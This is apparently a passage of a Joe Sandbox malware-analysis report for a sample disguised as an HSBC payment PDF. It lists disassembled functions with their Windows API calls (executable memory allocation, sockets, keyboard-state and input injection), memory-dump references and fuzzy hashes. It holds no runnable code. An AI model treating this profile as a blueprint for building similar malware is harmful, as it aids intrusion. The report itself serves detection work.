                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                    • API String ID: 2574300362-199464113
                                                                                                                                                    • Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                                                                                                                    • Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
                                                                                                                                                    • Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                                                                                                                    • Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754
                                                                                                                                                    Function 0045717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                                                                                                                    • Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
                                                                                                                                                    • Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                                                                                                                    • Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94
                                                                                                                                                    Function 0047E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0047E101
                                                                                                                                                      • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                                                                                                                                                    • _memmove.LIBCMT ref: 0047E314
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3659485706-0
                                                                                                                                                    • Opcode ID: b3528aa481f7fcb0eb8522191f92e70b5ace6c5fa3869cfeab60d5d6ffa76828
                                                                                                                                                    • Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
                                                                                                                                                    • Opcode Fuzzy Hash: b3528aa481f7fcb0eb8522191f92e70b5ace6c5fa3869cfeab60d5d6ffa76828
                                                                                                                                                    • Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86
                                                                                                                                                    Function 00478093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 004780C3
                                                                                                                                                    • CoUninitialize.OLE32 ref: 004780CE
                                                                                                                                                      • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 004780D9
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004783AA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 780911581-0
                                                                                                                                                    • Opcode ID: e0598b6a95aabee3d6d7fa6bb81cfef96e97d1b35fca084c28bd1702e1ced289
                                                                                                                                                    • Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
                                                                                                                                                    • Opcode Fuzzy Hash: e0598b6a95aabee3d6d7fa6bb81cfef96e97d1b35fca084c28bd1702e1ced289
                                                                                                                                                    • Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A
                                                                                                                                                    Function 0045687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2808897238-0
                                                                                                                                                    • Opcode ID: 1a73f5e827cafa9a32e666fb2eece23f75d1219170068d3f03f0e50f057af89d
                                                                                                                                                    • Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
                                                                                                                                                    • Opcode Fuzzy Hash: 1a73f5e827cafa9a32e666fb2eece23f75d1219170068d3f03f0e50f057af89d
                                                                                                                                                    • Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D
                                                                                                                                                    Function 004769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                                                                                                                                                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2214342067-0
                                                                                                                                                    • Opcode ID: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                                                                                                                                                    • Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
                                                                                                                                                    • Opcode Fuzzy Hash: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                                                                                                                                                    • Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59
                                                                                                                                                    Function 0047641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                                                                                                                                                    • _strlen.LIBCMT ref: 004764D9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4218353326-0
                                                                                                                                                    • Opcode ID: 092f116c2936bc2b87017b652f83589aa4a7c30a877edbafeb18071167529c0a
                                                                                                                                                    • Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
                                                                                                                                                    • Opcode Fuzzy Hash: 092f116c2936bc2b87017b652f83589aa4a7c30a877edbafeb18071167529c0a
                                                                                                                                                    • Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58
                                                                                                                                                    Function 00488851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InvalidateRect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 634782764-0
                                                                                                                                                    • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                                                                                                    • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                                                                                                                                                    • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                                                                                                    • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                                                                                                                                                    Function 0048AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                                                                                                    • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 0048AC57
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1352109105-0
                                                                                                                                                    • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                                                                                                    • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                                                                                                                                                    • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                                                                                                    • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                                                                                                                                                    Function 00460AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                                                                                                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                                                                                                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                    • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                                                                                                    • Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
                                                                                                                                                    • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                                                                                                    • Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
                                                                                                                                                    Function 00460C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00460C66
                                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                                                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00460D33
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                    • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                                                                                                    • Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
                                                                                                                                                    • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                                                                                                    • Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B
                                                                                                                                                    Function 004361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
                                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 00436229
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                                    • Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                                                                                                                    • Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
                                                                                                                                                    • Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                                                                                                                    • Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754
                                                                                                                                                    Function 00484EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00484F02
                                                                                                                                                      • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
                                                                                                                                                      • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
                                                                                                                                                      • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
                                                                                                                                                    • GetCaretPos.USER32(?), ref: 00484F13
                                                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00484F4E
                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00484F54
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2759813231-0
                                                                                                                                                    • Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                                                                                                                    • Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
                                                                                                                                                    • Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
